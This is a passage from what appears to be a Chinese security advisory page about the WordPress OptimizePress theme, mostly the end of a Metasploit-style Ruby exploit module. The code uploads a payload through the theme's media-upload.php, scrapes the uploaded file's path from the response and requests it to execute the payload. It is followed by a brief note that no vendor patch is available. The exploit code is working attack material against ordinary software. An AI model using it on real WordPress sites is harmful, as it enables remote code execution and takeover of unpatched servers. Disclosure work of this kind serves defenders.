WordPress OptimizePress主题'media(2)

res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php'),
      'ctype' => 'multipart/form-data; boundary=' + post_data.bound,
      'data' => n_data,
      'headers' => {
        'Referer' => "#{uri}/wp-content/themes/OptimizePress/lib/admin/media-upload.php"
      },
      'cookie' => cookie
    })

unless res and res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Unable to upload payload")
    end

print_good("#{peer} - Payload uploaded successfully. Disclosing the payload path...")
    #get path to payload
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'      => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php')
    })

unless res and res.code == 200
      fail_with(Failure::Unknown, "#{peer} - Unable to access vulnerable URL")
    end

payload_url = ""

if res.body =~ /name="cs_img" value="(.*#{filename}.*)" \/> <span/
      payload_url =$1
    else
      fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload")
    end

begin
      u = URI(payload_url)
    rescue ::URI::InvalidURIError
      fail_with(Failure::Unknown, "#{peer} - Unable to deliver the payload, #{payload_url} isn't an URL'")
    end

register_files_for_cleanup(File::basename(u.path))

print_good("#{peer} - Our payload is at: #{u.path}! Executing payload...")
    send_request_cgi({
      'method' => 'GET',
      'uri' => u.path
    })
  end
end

建议:
--------------------------------------------------------------------------------
厂商补丁:

optimizepress
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/adc8f64f6b39c0e985f2cd9998924ec2.html